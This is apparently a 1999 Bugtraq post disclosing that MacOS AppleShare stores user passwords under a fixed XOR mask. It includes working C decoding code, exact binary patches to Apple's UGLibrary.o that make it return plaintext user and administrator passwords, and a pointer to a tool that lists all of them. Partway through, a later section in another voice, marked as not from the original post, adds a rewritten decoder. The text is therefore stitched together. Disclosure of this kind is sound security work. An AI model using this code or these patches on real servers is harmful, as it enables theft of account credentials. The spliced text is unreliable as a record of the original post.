Last modification date: Oct 7, 1999
From spd Tue Sep 14 22:10:54 1999
Subject: MacOS system encryption algorithm 3
To: BUGTRAQ@SECURITYFOCUS.COM
Date: Tue, 14 Sep 1999 22:10:54 +0200 (DST)
Some time ago, Dawid adix Adamski <adixx at FRIKO4.ONET.PL> sent to
bugtraq the encryption algorithm he found in the MacOS personal AppleShare
server.
I have been researching a little on this subject, and I've found that
his code fails when decoding the first character of the password;
for this character you need additional data from the "Users & Groups
Data File", specifically the 4th byte after the encoded sequence
described in his message.
So, after cleaning up the code a little, you get something as simple as
this:
---------------------------------------------------------------------------
#include <stdio.h>

int main(void)
{
    int i;
    /* fixed XOR mask used by the Users & Groups data file */
    const unsigned char mask[] = "rpcgtprk";
    /* 8 encoded password bytes, 3 unused bytes, then the 4th byte after
       the sequence, which is needed for the first character.
       A writable array: the original modified a string literal in place. */
    unsigned char pw[] = "\x28\x08\x2F\x3B\x20\x36\x30\x5B\x00\x00\x00\x09";
    unsigned char c;

    /* characters 7..1: each one depends on the preceding encoded byte */
    for (i = 0; i < 7; i++) {
        c = pw[6 - i] ^ mask[7 - i];
        pw[7 - i] ^= c;
    }
    /* character 0 depends on pw[11] instead of a preceding byte */
    c = pw[11] ^ mask[7 - i];
    pw[7 - i] ^= c;

    printf("\"%s\"\n", (char *)pw);
    return 0;
}
---------------------------------------------------------------------------
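As an added example (not code from the original post or from SPDsoft), here is the same decoding written as a function over a 12-byte record, which makes the structure of the scheme explicit: every character is its encoded byte XORed with the preceding encoded byte and one byte of a fixed mask, and the first character borrows the 4th byte after the sequence in place of a predecessor. Nothing in it is keyed, so anyone who can read the data file recovers every password; treating such a file as if it held hashed credentials is the risk the post points at. The record layout assumed here (bytes 0..7 encoded password, bytes 8..10 unused, byte 11 the extra byte) is read from the snippet above and the sample bytes are the ones the post quotes.

```c
#include <stdio.h>
#include <string.h>

#define UG_RECORD_LEN 12   /* bytes taken from the data file per user */
#define UG_PW_LEN 8        /* encoded password bytes inside the record */

/* Fixed mask from the post; there is no per-user key material. */
static const unsigned char UG_MASK[UG_PW_LEN] =
    { 'r', 'p', 'c', 'g', 't', 'p', 'r', 'k' };

/* Decode one record into a NUL-terminated string of up to 8 characters
 * and return its length.
 *   plain[k] = enc[k] ^ enc[k-1] ^ mask[k]   for k = 7 .. 1
 *   plain[0] = enc[0] ^ enc[11] ^ mask[0]
 * Reading the neighbour from the untouched record (instead of in place)
 * removes the ordering subtlety of the post's loop, which had to run from
 * the highest index downwards so each predecessor was still encoded. */
int ug_decode_password(const unsigned char rec[UG_RECORD_LEN],
                       char out[UG_PW_LEN + 1])
{
    int k;
    for (k = UG_PW_LEN - 1; k >= 1; k--)
        out[k] = (char)(rec[k] ^ rec[k - 1] ^ UG_MASK[k]);
    out[0] = (char)(rec[0] ^ rec[UG_RECORD_LEN - 1] ^ UG_MASK[0]);
    out[UG_PW_LEN] = '\0';
    return (int)strlen(out);
}

/* Constructed sample record: the 12 bytes quoted in the post. */
static const unsigned char SAMPLE_REC[UG_RECORD_LEN] = {
    0x28, 0x08, 0x2F, 0x3B, 0x20, 0x36, 0x30, 0x5B,
    0x00, 0x00, 0x00, 0x09
};

int main(void)
{
    char pw[UG_PW_LEN + 1];
    int n = ug_decode_password(SAMPLE_REC, pw);
    printf("%d chars: \"%s\"\n", n, pw);
    return 0;
}
```

The function takes the record as a const pointer, so it can be run directly over a buffer read from the file without copying it first; a password shorter than 8 characters decodes with a 0x00 byte at its end, which is what terminates the string.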
But you still have to find the encrypted passwords in the binary
data file.
Apple's AppleShare SDK provides a "UGLibrary" to deal with this
data file, but it doesn't let you access the user password (which
is decrypted on the stack when you call "UGAuthenticateUser()"),
nor the encrypted one.
In fact, in this call the encrypted password is decrypted to the
stack and compared against the user-supplied one.
So, all we have to do is replace the compare with a copy:
* 00000206: B036 70F4 '.6p.' CMP.B -$0C(A6,D7.W),D0
* 0000020A: 6710 'g.' BEQ.S *+$0012 ; 0000021C
*
is replaced with
*
* # ADDQ.W #$02,A2 544A
* # MOVE.B D0,-(A2) 1500
* # BRA.S *+$0012 6010
*
* i.e., go to offset 28A0 and replace "B036 70F4 6710" with "544A 1500 6010"
* in "UGLibrary.o"
After that, we can build a simple program (about 150 lines) and
with just a double click, we get a listing with all the users
and decoded passwords in the system.
That's enough for the personal AppleShare server included with
MacOS 7.x and 8.x; for AppleShare server 3.x (and probably 4.x;
I didn't check it) the data file is protected by an "administrator
password", so you need it before being able to use the modified
UGAuthenticateUser().
But that password uses the same encryption algorithm/check as
the users' ones, so we only have to change "UGOpenFile()" in the
same way:
at offset 0A92, B030 7000 671A becomes 544A 1500 601A
So, with these modifications, the AppleShare 3.x admin password
is returned in filePB.ugAdminKey after UGOpenFile() and
user passwords are returned in userPB.ugPassword after
UGAuthenticateUser(), both in plain text.
A program which uses this method for listing users and passwords
can be found (both MacOS 68k binary and source code) at
ftp://ivo.cps.unizar.es/pub/SPDsoft/ASPID.sit
(Stuffit 5.x archive)
All of these use Adixx's code; ASPID uses Apple's UG Lib code instead.